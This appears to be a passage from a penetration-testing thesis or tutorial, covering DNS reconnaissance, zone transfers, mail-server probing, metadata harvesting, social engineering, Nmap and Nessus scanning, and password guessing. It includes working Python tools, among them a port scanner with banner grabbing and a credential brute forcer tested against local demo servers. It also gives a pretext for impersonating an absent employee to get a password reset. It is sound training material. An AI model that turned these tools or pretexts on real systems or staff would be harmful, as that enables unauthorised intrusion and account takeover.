malicious hacker understands not only the power of good reconnaissance but also that of a nearly
limitless amount of time. As an aspiring penetration tester, you should devote as much time as
possible to practicing and conducting information gathering.
A very simple but effective means of collecting additional information about our target is Whois.
The Whois service allows us to access specific information about our target, including the IP
addresses or host names of the company's Domain Name System (DNS) servers and contact
information, usually containing an address and phone numbers. Whois is built into the Linux
operating system. The simplest way to use this service is to open a terminal and enter the
following command, using BackTrack Linux for penetration testing purposes.

13

Figure 2.3
Partial output from a Whois Query

Example to find out information about syngress, we would issue the following command:
Whois syngress.com. Figure 2.2 shows a partial output from the result of this tool.
It is important to record all the information and pay special attention to the DNS servers. If the
DNS servers are listed by name only, as shown in figure 2.2, we will use the Host command to
translate those names into IP addresses.
In terms of reconnaissance, gaining full access to a company's DNS server is like finding a pot of
gold at the end of a rainbow. Or maybe, more accurately, it is like finding a blueprint of the
organization.

NS LOOKUP: The first tool we will use to examine DNS is nslookup. Nslookup is a tool that can be
used to query DNS servers and potentially obtain records about the various hosts of which they are
aware. Nslookup is built into many versions of Linux, including BackTrack, and is even available
from the Windows command prompt.
Nslookup operates very similarly across the various operating systems. However, you should always
review the specifics for your particular system. You can do so in Linux by reviewing the nslookup
man page. This is accomplished by opening a terminal and typing:
root@bt:~# man nslookup


Nslookup can be run in interactive mode. This simply means we first invoke the program and then
feed it the commands it needs to do what we want. We begin by opening a terminal and entering:
root@bt:~# nslookup
After typing nslookup and hitting enter, the usual # prompt is replaced with a > prompt. At this
point you can enter the additional information nslookup needs.
We begin feeding commands to nslookup by entering the server keyword followed by the IP address
of the DNS server we want to query. An example follows:
server 41.66.193.148
Nslookup simply accepts the command and presents another > prompt. Next, we specify the type of
record we are looking for. During the reconnaissance process there are many record types you may
be interested in; for a complete listing of the DNS record types and their descriptions, use your
newly acquired Google skills. If you are looking for general information, set the type to any:
set type=any
If you are looking for specific information from the DNS server, such as the IP address of the
mail server that handles e-mail for the target organization, set the type to mx instead:
set type=mx


Figure 2.4 Using Host and NS Lookup to Determine the Email of our Target.

We wrap up our initial DNS interrogation with nslookup by entering the target domain (for example,
syngress.com) after the next > prompt; nslookup then returns the records of the requested type.

Dig is another great tool for extracting information from DNS. To work with dig, we simply
open a terminal and enter the following command:
dig @target_ip
Naturally, you will need to replace target_ip with the actual IP address of your target's DNS
server. Among other things, dig makes it very simple to attempt a zone transfer. Recall that a zone
transfer is used to pull multiple records from a DNS server: in some cases it results in the target
DNS server sending every record it holds for the zone. This is especially valuable if your target
does not distinguish between internal and external hosts when answering a zone transfer, because
the transfer then hands you internal host names and private IP addresses as well.
If we wanted to attempt a zone transfer against a fictitious DNS server with the IP address
192.168.1.23 and the domain name example.com, we would issue the following command in a
terminal window:
dig @192.168.1.23 example.com -t AXFR
If zone transfers are allowed and not restricted, you will be presented with a listing of the hosts
and IP addresses in the target domain. A properly configured server only allows AXFR from its
secondary name servers and answers everyone else with "; Transfer failed." Try each name server
listed in the NS records, since a zone is often transferable from one of them even when the primary
refuses. BackTrack has many additional tools that can be used to interact with DNS; however, these
tools should be explored and utilized once you have a solid understanding of how DNS works.
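As an added example (not part of the thesis or of dig itself), the following Python script triages the text dig prints for a successful AXFR: it pulls out the A and AAAA records and separates hosts that point at private (RFC 1918 / IPv6 unique-local) addresses from globally routable ones, which is exactly the internal/external leak the paragraph above warns about. The zone, host names and addresses in SAMPLE_AXFR are constructed, and try_zone_transfer is a hypothetical wrapper around the dig command shown above that needs network access and the dig binary.

```python
"""Triage of a DNS zone transfer (AXFR) result."""
import ipaddress
import subprocess

# Constructed sample of `dig ... AXFR` output for a fictitious zone (not real data).
SAMPLE_AXFR = """\
; <<>> DiG 9.9.5 <<>> @192.168.1.23 example.com -t AXFR
;; global options: +cmd
example.com.            3600  IN  SOA   ns1.example.com. hostmaster.example.com. 2014110101 3600 900 604800 86400
example.com.            3600  IN  NS    ns1.example.com.
example.com.            3600  IN  MX    10 mail.example.com.
ns1.example.com.        3600  IN  A     203.0.113.10
mail.example.com.       3600  IN  A     203.0.113.25
www.example.com.        3600  IN  A     203.0.113.80
intranet.example.com.   3600  IN  A     10.0.0.12
fileserver.example.com. 3600  IN  A     10.0.0.14
vpn.example.com.        3600  IN  AAAA  2001:db8::1
example.com.            3600  IN  SOA   ns1.example.com. hostmaster.example.com. 2014110101 3600 900 604800 86400
"""

# RFC 1918 and IPv6 unique-local space, checked explicitly: ipaddress's
# is_private also covers documentation ranges such as 203.0.113.0/24.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_axfr(text):
    """(hostname, ip) for every A/AAAA record in dig's AXFR output."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue  # dig comments and blank lines
        fields = line.split()  # NAME TTL CLASS TYPE RDATA...
        if len(fields) < 5 or fields[2] != "IN" or fields[3] not in ("A", "AAAA"):
            continue
        try:
            ip = str(ipaddress.ip_address(fields[4]))
        except ValueError:
            continue  # malformed rdata: skip rather than crash the triage
        records.append((fields[0].rstrip("."), ip))
    return records


def split_internal_external(records):
    """Partition (host, ip) records into internal (private) and external hosts."""
    internal, external = [], []
    for host, ip in records:
        (internal if is_internal(ip) else external).append((host, ip))
    return internal, external


def try_zone_transfer(nameserver, zone, timeout=10):
    """Hypothetical wrapper: run the dig command from the text against one name
    server and return its output, or None when dig is absent, times out or the
    server refuses. Needs network access; not exercised by the offline sample."""
    try:
        result = subprocess.run(
            ["dig", "@" + nameserver, zone, "-t", "AXFR", "+time=%d" % timeout],
            capture_output=True, text=True, timeout=timeout + 5,
        )
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return None if "Transfer failed" in result.stdout else result.stdout


if __name__ == "__main__":
    internal, external = split_internal_external(parse_axfr(SAMPLE_AXFR))
    print("external:", external)
    print("internal (should never appear in a public zone):", internal)
```

Run it against each name server from the NS records in turn; any host that lands in the internal list is both a finding in its own right and a target for the next round of reconnaissance.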
E-mail servers can provide a wealth of information for hackers and penetration testers. In many
ways, e-mail is like a revolving door into the target organization. Assuming the target hosts its
own e-mail server, this is often a great place to attack. It is important to remember: "You can't
block what you must let in." In other words, for e-mail to function properly, external traffic
must pass through the border devices, such as routers and firewalls, to an internal machine,
typically somewhere inside the protected network.
As a result, we can often gather significant pieces of information by interacting directly with
the e-mail server. One of the first things to do when performing reconnaissance against an e-mail
server is to send the organization an e-mail carrying an empty .bat file or a non-malicious .exe
file such as calc.exe. The goal is to have the target's e-mail server inspect and then reject the
message. Note that this is an active technique: the probe lands in the target's mail logs, so it
belongs inside the engagement's scope and rules of engagement.
Once the rejected message is returned to us, we can attempt to extract information about the
target e-mail server. In many cases the body of the bounce will include a canned write-up
explaining that the server does not accept e-mail with potentially dangerous extensions. This
message often names the specific vendor and version of the antivirus product that scanned the
e-mail. For an attacker, this is a great piece of information to have.
Having a bounced message from the target e-mail server also allows us to inspect the e-mail's
headers. The Received: headers in particular will often reveal basic information about the e-mail
server, including its IP addresses and the brand and version of the mail software it runs.
Knowing the IP address and software version can be incredibly useful when we move into the
exploitation phase.
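The header walk described above, written out as an added Python example that is not part of the thesis: SAMPLE_BOUNCE is a constructed rejection message (the hosts, addresses and version strings in it are made up), parse_received reads the Received: headers newest-first, target_mail_server picks out the hops handled by the target's own server to recover its address and announced software, and scanner_rejection finds the line in the body that names the content filter.

```python
"""Pull server details out of a bounced (rejected) e-mail."""
import email
import re
from email import policy

# Constructed bounce message: hosts, addresses and version strings are made up.
SAMPLE_BOUNCE = """\
Return-Path: <>
Received: from mail.example.com (mail.example.com [203.0.113.25])
\tby mx.attacker-isp.example ([198.51.100.7]) with ESMTP id 4Z8k2p1;
\tThu, 06 Nov 2014 10:12:01 +0000
Received: from localhost (localhost [127.0.0.1])
\tby mail.example.com (Postfix 2.9.6) with ESMTP id 7A1C3D;
\tThu, 06 Nov 2014 10:12:00 +0000
From: Mail Delivery System <MAILER-DAEMON@example.com>
To: tester@attacker-isp.example
Subject: Undeliverable: product inquiry
Content-Type: text/plain

Your message was rejected by the mail filter.
ExampleAV Mail Gateway 7.1.2 does not accept attachments with the extension .exe
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# "from HOST (comment)" and "by HOST (comment)"; the comment after "by" is where
# the receiving server tends to announce its software and version.
FROM_RE = re.compile(r"\bfrom\s+(\S+)\s*(?:\(([^)]*)\))?")
BY_RE = re.compile(r"\bby\s+(\S+)\s*(?:\(([^)]*)\))?")


def parse_received(raw_message):
    """Return one dict per Received: header, newest (outermost) first."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hops = []
    for hdr in msg.get_all("Received", []):
        text = " ".join(str(hdr).split())  # unfold continuation lines
        frm, by = FROM_RE.search(text), BY_RE.search(text)
        hops.append({
            "from": frm.group(1) if frm else None,
            "from_comment": frm.group(2) if frm else None,
            "by": by.group(1) if by else None,
            "by_comment": by.group(2) if by else None,
            "ips": IP_RE.findall(text),
        })
    return hops


def _in_domain(host, domain):
    return bool(host) and (host == domain or host.endswith("." + domain))


def target_mail_server(raw_message, target_domain):
    """Host, announced software and IP of the target's own mail server, or None."""
    info = {"host": None, "software": None, "ips": []}
    for hop in parse_received(raw_message):
        if _in_domain(hop["by"], target_domain):      # the target server received here
            info["host"] = info["host"] or hop["by"]
            info["software"] = info["software"] or hop["by_comment"]
        if _in_domain(hop["from"], target_domain):    # the target server handed off here
            info["host"] = info["host"] or hop["from"]
            info["ips"].extend(IP_RE.findall(hop["from_comment"] or ""))
    return info if info["host"] else None


def scanner_rejection(raw_message):
    """The body line naming the content scanner (vendor + version), if present."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    for line in text.splitlines():
        if re.search(r"does not accept|rejected|blocked", line, re.I) and re.search(r"\d+\.\d+", line):
            return line.strip()
    return None
```

Received: headers are prepended by each server in turn, so the outermost one is the last hop and the innermost is the first; the target's own server appears on the "by" side of an inner hop (with its software comment) and on the "from" side of the next hop out (with its public address).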
Another important tool is MetaGooFil, a metadata extraction tool. Metadata is defined as data
about data. When you create a document such as a Microsoft Word file or a PowerPoint presentation,
additional data is created and stored within the file. This metadata often includes various pieces
of information describing the document, including the file name, the file size, the file owner or
the username of the person who created it, and the location or path where the file was saved. This
happens automatically, without any user input or interaction. MetaGooFil searches for the
target's publicly available documents and extracts this metadata from them. It is built into
BackTrack and can be found by navigating to the Information Gathering section under the
BackTrack option in the All Programs menu.
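As an added example that is not MetaGooFil's code and not from the thesis, the following Python builds a minimal .docx in memory with made-up metadata (author kmensah, company Example Sales Ltd) and then reads it back the way a metadata extractor does: a .docx is a zip archive, and the creator, last-modified-by account and application version live in docProps/core.xml and docProps/app.xml. The same docProps layout applies to .xlsx and .pptx files.

```python
"""Reading the metadata an Office document carries with it."""
import io
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

# Constructed docProps content with made-up values (author, company, timestamps).
CORE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}" xmlns:dcterms="{dcterms}">
  <dc:creator>kmensah</dc:creator>
  <cp:lastModifiedBy>EXAMPLE\\kmensah</cp:lastModifiedBy>
  <dcterms:created>2014-09-30T08:15:00Z</dcterms:created>
  <dcterms:modified>2014-10-02T16:40:00Z</dcterms:modified>
</cp:coreProperties>""".format(**NS)

APP_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="{ep}">
  <Application>Microsoft Office Word</Application>
  <AppVersion>14.0000</AppVersion>
  <Company>Example Sales Ltd</Company>
</Properties>""".format(**NS)


def build_sample_docx():
    """Construct a minimal .docx (zip) in memory carrying the metadata above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder, not a real Word body
        zf.writestr("docProps/core.xml", CORE_XML)
        zf.writestr("docProps/app.xml", APP_XML)
    return buf.getvalue()


def _text(root, path):
    node = root.find(path, NS)
    return node.text.strip() if node is not None and node.text else None


def extract_metadata(docx_bytes):
    """Recon-relevant fields from a .docx/.xlsx/.pptx file's docProps parts."""
    meta = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(zf.read("docProps/core.xml"))
            meta["creator"] = _text(core, "dc:creator")
            meta["last_modified_by"] = _text(core, "cp:lastModifiedBy")
            meta["created"] = _text(core, "dcterms:created")
            meta["modified"] = _text(core, "dcterms:modified")
        if "docProps/app.xml" in names:
            app = ET.fromstring(zf.read("docProps/app.xml"))
            meta["application"] = _text(app, "ep:Application")
            meta["app_version"] = _text(app, "ep:AppVersion")
            meta["company"] = _text(app, "ep:Company")
    return meta


def usernames_from_metadata(meta):
    """Creator / last-modified-by values as candidate account names (DOMAIN\\user -> user)."""
    names = set()
    for key in ("creator", "last_modified_by"):
        value = meta.get(key)
        if value:
            names.add(value.split("\\")[-1].lower())
    return sorted(names)


if __name__ == "__main__":
    meta = extract_metadata(build_sample_docx())
    print(meta)
    print("candidate usernames:", usernames_from_metadata(meta))
```

The lastModifiedBy value is the one to watch: it is frequently the user's Windows logon name, sometimes with the domain prefix, and the AppVersion tells you which Office release to target.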
Many people would argue that social engineering is one of the simplest and most effective means
of gathering information about a target.
Social engineering is the process of exploiting the human weakness that is inherent in every
organization. When utilizing social engineering, the attacker's goal is to get an employee to
divulge (make known) some information that should be kept confidential. Let us take our social
engineering example one step further. Suppose our salesman's name is Kofi Mensah (we found this
information during our reconnaissance of the company website and in the signature of his e-mail
response). Let us assume that, when you sent the employee the product inquiry e-mail, you received
an automatic reply notifying you that Kofi Mensah was currently out of the office travelling
overseas and would be gone for two weeks with only limited e-mail access.

The classic example of social engineering would be to impersonate Kofi Mensah and call the
target company's tech support number asking for help resetting your password because you are
overseas and cannot access your webmail. If you are lucky, the technical support people will
believe your story and reset the password. Successful social engineers must be supremely
confident, knowledgeable about the situation, and flexible enough to go off script. If you are
conducting social engineering over the phone, it can be extremely helpful to have detailed and
well-written notes in case you are asked about some obscure detail.
Once the reconnaissance step is completed, you should have a solid understanding of your target,
including the organization, its structure, and even the technologies deployed inside the company.
After we have thoroughly reviewed the collected reconnaissance and transformed the data into
attackable targets, we should have a list of IPs that either belong to or are related to the
target.
In summary, reconnaissance is a vital technique, more important than even putting in place the
world's best firewall on your network, and it should not be overlooked. Social engineering has
numerous techniques, such as:

Shoulder surfing: a security attack in which the attacker uses observation techniques, such as
looking over someone's shoulder, to get information while the victim performs a task.

Dumpster diving: large organizations carelessly dump items such as company phone books, system
manuals, organization charts, company policy manuals, calendars of meetings, events and vacations,
printouts of sensitive data or login names and passwords, printouts of source code, disks and
tapes, company letterhead and memo forms, and outdated hardware into the company dumpsters, where
an attacker can retrieve them.

Role playing: persuading or gathering information through an online chat session, e-mail, phone
or any other channel the company uses to interact with the public, pretending to be a help desk,
employee or technician so that the victim divulges confidential information.

Trojan horse: one of the most predominant methods currently used by hackers, which involves
tricking the victim into downloading a malicious file onto the system they are using.

Phishing: the act of creating and using websites and e-mails designed to look like those of
well-known legitimate businesses, financial institutions and government agencies, falsely claiming
to be an established legitimate enterprise in an attempt to deceive Internet users into
surrendering personal information that will be used for identity theft.

2.3. Scanning and enumeration phase: Scanning is the process of identifying live systems and
the services that exist on those systems. The process is divided into three distinct phases:
1. Determining whether a system is alive
2. Port scanning the system
3. Scanning the system for vulnerabilities

The first phase determines whether a target system is turned on and capable of communicating or
interacting with our machine. From there our focus moves to port scanning and scanning the system
for vulnerabilities. Many common network services run on standard port numbers and can give
attackers an indication of the function of the target system. Remember, every open port is a
potential gateway into the target system. The fundamental goal of scanning is to identify potential
targets by locating security holes and vulnerabilities on the target host or network. All the
tools used for this phase and the following phases must be thoroughly tested in a lab environment
prior to using them in a live scenario.
Below is the list of some common tools to perform scanning;

Telnet (can report information about an application or service)

Nmap (powerful tool available for Unix that finds ports and services available via IP)

Hping2 (powerful Unix based tool used to gain important information about a network)

Netcat (others have quoted this application as the Swiss Army Knife of network
utilities)

Ping (Available on most every platform and operating system to test for IP connectivity)

Traceroute (maps out the hops of the network to the target device or system)

Queso (can be used for operating system fingerprinting)

Vulnerability scanning is the process of locating and identifying known weaknesses in the
services and software running on a target machine. The discovery of known vulnerabilities on a
target system can be like finding the pot of gold at the end of a rainbow. Some vulnerabilities
present little opportunity for an attacker, whereas others will allow you to completely take over
and control a machine with a single click of a button.
First and foremost, we scan perimeter devices such as servers, routers, firewalls or other
equipment that sit between protected internal resources and external networks like the Internet,
looking for weaknesses or vulnerabilities that will allow us to gain entry into the network. A ping
sends an ICMP Echo Request packet to a host; if the host is alive and not restricted from
responding, it answers the originating machine with an ICMP Echo Reply packet.
A ping sweep is a series of pings that are automatically sent to a range of IP addresses rather
than manually entering each target's address. The simplest way to run a ping sweep is with a tool
called fping. Fping is built into BackTrack, is run from the terminal, and can also be downloaded
for Windows. The easiest way to run fping is to open a terminal window and type, for example:
fping -a -g 172.16.45.1 172.16.45.254 > hosts.txt
The -a switch is used to show only the live hosts in our output, -g specifies the range of IP
addresses, > redirects the output to a file, and hosts.txt is the name of the file our results
will be saved to.
It is important to remember that not every host will respond to ping requests; some hosts may be
firewalled or otherwise blocking ping packets, so a host missing from the sweep is not necessarily
down.
After listing the target machines that are alive, recall that the goal of port scanning is to
identify which ports are open and determine what services are available on our target system.
Every computer has 65,536 TCP ports and 65,536 UDP ports (numbered 0 through 65,535); whether a
port is TCP or UDP depends on the service using it and the nature of the communication occurring
on it. We scan computers to see which ports are in use or open. This gives us a better picture of
the purpose of the machine, which in turn gives us a better idea of how to attack the box.
Learning the command-line version of your tools is critical, because once you have control of a
machine you will need to upload your tools and interact with the target through a command prompt,
not a graphical user interface. When you gain access to your target machine you will not be
presented with a GUI but with a command prompt. If you do not know how to copy files, add users,
modify documents and make other changes through the command line, your work of owning the target
will have been in vain.


Nmap is a scanning tool. To run a TCP connect scan from the command line, we issue the following
command from the terminal:
nmap -sT -p- -PN 172.16.45.1-254
(this example covers 172.16.45.1 through 172.16.45.254). Take a moment to review this command.
The first word, nmap, starts the Nmap port scanner. The -sT switch tells Nmap to run a TCP connect
scan: the -s tells Nmap what kind of scan we want to run, and the T selects the TCP connect scan
type. A TCP connect scan completes the full three-way handshake on every port, which needs no
special privileges but is also the easiest scan for the target to log. We use -p- to tell Nmap to
scan all 65,535 ports, not just the 1,000 most common ports it scans by default. We use the -PN
switch (written -Pn in current Nmap versions) to skip the host discovery phase and scan all the
addresses as if they were alive and responding to ping requests.
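To show what -sT actually does on the wire, here is an added Python example (not Nmap's code and not from the thesis) that performs a TCP connect scan with a small thread pool and reads the first bytes each open service sends, which is how service banners are collected. So that it runs offline it starts a throwaway listener on 127.0.0.1 that announces a made-up OpenSSH banner; the host, port range and timeout are the caller's choice.

```python
"""TCP connect scan with banner grabbing (what `nmap -sT` does at the socket level)."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def connect_scan(host, ports, timeout=0.5, workers=64):
    """Return {port: banner} for every port that completed the three-way handshake.

    A banner of "" means open but silent (the service waits for the client to
    speak first, as HTTP does). Closed and filtered ports are left out.
    """
    def probe(port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            try:
                if s.connect_ex((host, port)) != 0:  # RST (closed) or no answer (filtered)
                    return port, None
            except OSError:                          # timeout surfaced as an exception
                return port, None
            try:
                return port, s.recv(256).decode("latin-1", "replace").strip()
            except OSError:                          # timeout or reset while waiting for a banner
                return port, ""
        finally:
            s.close()

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {p: b for p, b in pool.map(probe, ports) if b is not None}


def start_fake_service(banner, host="127.0.0.1"):
    """Throwaway listener on an OS-chosen port that greets every client with `banner`.

    Returns (port, stop) where stop() shuts the listener down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(16)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set


def demo():
    """Scan a 7-port window around a fake SSH listener; returns (listener_port, open_ports)."""
    port, stop = start_fake_service(b"SSH-2.0-OpenSSH_5.3\r\n")  # constructed banner
    try:
        window = range(max(1, port - 3), port + 4)
        return port, connect_scan("127.0.0.1", window)
    finally:
        stop()


if __name__ == "__main__":
    _, found = demo()
    for p in sorted(found):
        print("%5d/tcp open  %s" % (p, found[p] or "(no banner)"))
```

Because every probe is a full connect, each open port shows up in the target's service logs with the scanner's source address, which is why SYN scans (-sS, root required) are preferred when stealth matters.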
When conducting the laboratory penetration test using Nmap, the intelligence-gathering phase was
essential to understand the type and amount of information available before the actual test.
Intelligence gathering ranged from passive information gathering and active information gathering
to targeted scanning of the system and network.
In the laboratory network, intelligence gathering was carried out by network surveying, port
scanning and operating system (OS) fingerprinting. Nmap, along with a few tools such as xprobe
and tcpdump, was used for information gathering. Nmap was used extensively because it gave a lot
of flexibility in specifying targets. Nmap came pre-installed in BackTrack 5 R3 along with other
useful tools and was used to identify how many hosts reside within the network and their
associated IP addresses.
Nmap's ICMP ping sweep was used to identify live hosts in the network segment. When all the
IP addresses and network segments had been identified, port scanning along with OS and service
fingerprinting was carried out against the live hosts. Figure 2.6 shows an Nmap ICMP ping-sweep
scan run against the 10.0.0.0/24 network segment during network surveying.


Figure 2.5: Penetration Testing Topology

Figure 2.6: Nmaps ICMP ping-sweep scan of a network segment

From the above result, five live hosts responding to ICMP packets were identified. Among them,
the host at 10.0.0.5 was the BackTrack machine and was not scanned further because it was the
penetration tester's machine. This BackTrack machine was connected to the target network for
performing the internal network and system penetration test. The remaining four live hosts,
10.0.0.10, 10.0.0.12, 10.0.0.13 and 10.0.0.14, were further scanned and enumerated.


Figure 2.7: Enumerating the services on host 10.0.0.14

Now that we have used Nmap to list the IPs, open ports and services on each machine, it is time to
scan the targets for vulnerabilities. A vulnerability is a weakness in software or system
configuration that can be exploited; vulnerabilities come in many forms but are often associated
with missing patches. Nessus is a great tool for scanning for vulnerabilities and uses a
client/server architecture.
There are tools available that can automate vulnerability detection, many good vulnerability
scanners both commercial and open source are available. Some of them are;

Nessus

Shadow Security Scanner

Retina

ISS Scanner

GFI LAN guard

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerability that malicious hackers could use to gain access to any computer you
have connected to a network. It does this by running over 1200 checks on a given computer.
Nessus relies on the responses from the target computer without actually trying to exploit the
system. Depending on the scope of a vulnerability assessment, the security tester or hacker may
choose an exploitation tool to verify that reported vulnerabilities are exploitable.
In the test environment, the Nessus server performs the actual testing while the client provides
configuration and reporting functionality. The Nessus client-server architecture is shown below.

Nessus employs a client-server architecture: the server contains the vulnerability database
(plug-ins) and scanning engine, and the client contains the configuration tool and
report-generating tool. A scan is started after selecting the IP addresses to be scanned, the
plug-ins to run and the Nessus server. There are more than 1,000 plug-ins available for Nessus,
each of which checks for one or more vulnerabilities, and after the scan completes Nessus provides
a detailed report of the identified vulnerabilities and recommends a solution. The main features
of the Nessus vulnerability scanner include:

Identifies operating systems, applications, databases and services running on the host
systems

Scans for and detects open ports

Audits antivirus software

Discovers sensitive data such as credit card numbers

Identifies missing security patches

Supports all major operating systems

Web-based interface

Running Nessus performs a vulnerability assessment (or audit). This assessment involves three
distinct phases:

Scanning

Enumeration

Vulnerability Detection

Scanning
In this phase, Nessus probes a range of IP addresses on a network to determine which hosts are
alive. One type of probing sends ICMP echo requests to find active hosts, but does not discount
hosts that do not respond, as they might be behind a firewall. Port scanning can determine which
hosts are alive and which ports they have open.
Enumeration
In this phase, Nessus probes the network services on each host to obtain banners that contain
software and OS version information. Depending on what is being enumerated, username and password
brute forcing can also take place here.

Vulnerability Detection
Nessus probes the remote services against a list of known vulnerabilities such as input validation
flaws, buffer overflows, improper configuration, and many more.
To run a scan, the Nessus server must be running on some machine; then start a Nessus client. The
two most important tabs are Nessus Host, which allows entering the IP address of the Nessus server
to connect to, as well as the username and password needed to connect to that server, and Target
Selection, where the host(s) to be scanned are specified. Then hit the Start scan button.
After a scan, Nessus clients typically offer two means to analyze the results. The client itself
lists each vulnerability found, gauging its level of severity and suggesting to the user how the
problem could be fixed.
Nessus clients are also able to generate more comprehensive and graphical reports in a variety of
formats. This can be very helpful if an administrator is scanning a large number of computers and
would like an overall view of the state of the network.

2.4. Exploitation and privilege escalation:

Exploitation is the process of gaining control over a system. An exploit is the realization of a
vulnerability: exploits are issues or bugs in the software code that allow a hacker or attacker to
alter the original functionality of the software.
Once information has been gathered through reconnaissance and scanning, password cracking
techniques can be used to gain access to the target system. There are many different tools that
can be used for online password cracking; two of the most popular are Medusa and Hydra.


Medusa is described as a parallel login brute forcer that attempts to gain access to remote
authentication services. Medusa is capable of authenticating with a large number of remote
services, including AFP (the AppleTalk Filing Protocol, a client/server file-sharing protocol used
in AppleTalk networks), FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, REXEC
(remote exec, which allows you to execute non-interactive programs on another system), RLOGIN,
SMTP-AUTH, SNMP, SSHv2, Telnet, VNC, web forms, and more. In order to use Medusa you need several
pieces of information: the target IP address, a username or username list that you are attempting
to log in as, a password or dictionary file containing multiple passwords to use when logging in,
and the name of the service you are attempting to authenticate with.
One of the requirements listed above is a dictionary list. A password dictionary is a file
containing a list of potential passwords; these lists are often referred to as dictionaries
because they contain thousands or even millions of individual words.
Once you have your password dictionary, you need to decide whether you are going to attempt to
log in as a single user or supply a list of potential users. If your reconnaissance efforts were
rewarded with a list of usernames, you may want to start with those. If you were unsuccessful in
gathering usernames and passwords, you may want to focus on the e-mail addresses you collected
with the Harvester. Remember that the first part of an e-mail address can often be used to
generate a working domain username. Online guessing is also noisy: every failed attempt is logged,
and many services lock the account after a handful of failures, so keep the attempt count per
account low and agree on it before the test.
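An added Python example of the attack Medusa and Hydra automate, not from either tool or from the thesis: the four inputs the text lists (target, username list, password list, service) drive a loop over HTTP Basic authentication, stopping at the first credential pair the server accepts. The usernames are derived from constructed harvested e-mail addresses using the first part of the address, and for an offline run a small Basic-auth server with the made-up account kmensah / Winter2014 is started on 127.0.0.1. max_attempts is a safety valve standing in for the per-account limit agreed in the rules of engagement.

```python
"""Online dictionary attack against HTTP Basic authentication (Medusa/Hydra style)."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed inputs: harvested addresses and a tiny password dictionary.
HARVESTED_EMAILS = ["kofi.mensah@example.com", "ama.owusu@example.com"]
PASSWORD_LIST = ["password", "123456", "welcome1", "Winter2014"]


def usernames_from_emails(emails):
    """first.last@domain -> first.last, flast, first (common directory conventions)."""
    users = []
    for address in emails:
        local = address.split("@", 1)[0].lower()
        users.append(local)
        if "." in local:
            first, last = local.split(".", 1)
            users.append(first[0] + last)
            users.append(first)
    return list(dict.fromkeys(users))  # de-duplicate, keep order


def try_basic_login(host, port, path, user, password, timeout=5):
    """One authentication attempt; True when the server answers anything but 401."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        status = conn.getresponse().status
    finally:
        conn.close()
    return status != 401


def brute_force_basic(host, port, path, users, passwords, max_attempts=None):
    """Try every user against every password and stop at the first accepted pair.

    max_attempts is a safety valve: real services log every failure and often
    lock the account, so the budget should come from the rules of engagement.
    """
    attempts = 0
    for user in users:
        for password in passwords:
            if max_attempts is not None and attempts >= max_attempts:
                return None
            attempts += 1
            if try_basic_login(host, port, path, user, password):
                return user, password
    return None


class _BasicAuthHandler(BaseHTTPRequestHandler):
    """Throwaway target: one valid (made-up) account, everything else gets 401."""
    VALID = "Basic " + base64.b64encode(b"kmensah:Winter2014").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="webmail"')
            self.end_headers()

    def log_message(self, *args):  # keep the run quiet
        pass


def start_target():
    """Start the fake server on an OS-chosen port; returns (port, shutdown)."""
    srv = HTTPServer(("127.0.0.1", 0), _BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv.shutdown


def demo():
    """Run the attack against the fake server; returns the (user, password) found."""
    port, shutdown = start_target()
    try:
        users = usernames_from_emails(HARVESTED_EMAILS)
        return brute_force_basic("127.0.0.1", port, "/", users, PASSWORD_LIST, max_attempts=100)
    finally:
        shutdown()


if __name__ == "__main__":
    print("valid credentials:", demo())
```

Medusa and Hydra add what this loop lacks: many protocols, parallel connections, and resumable state; the decision that matters on a real engagement is the same, how many guesses per account the lockout policy lets you make.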
Some of the most popular password cracking tools are:

Brutus: one of the most popular remote online password cracking tools. It claims to be the
fastest and most flexible password cracking tool. This tool is free but is only available for
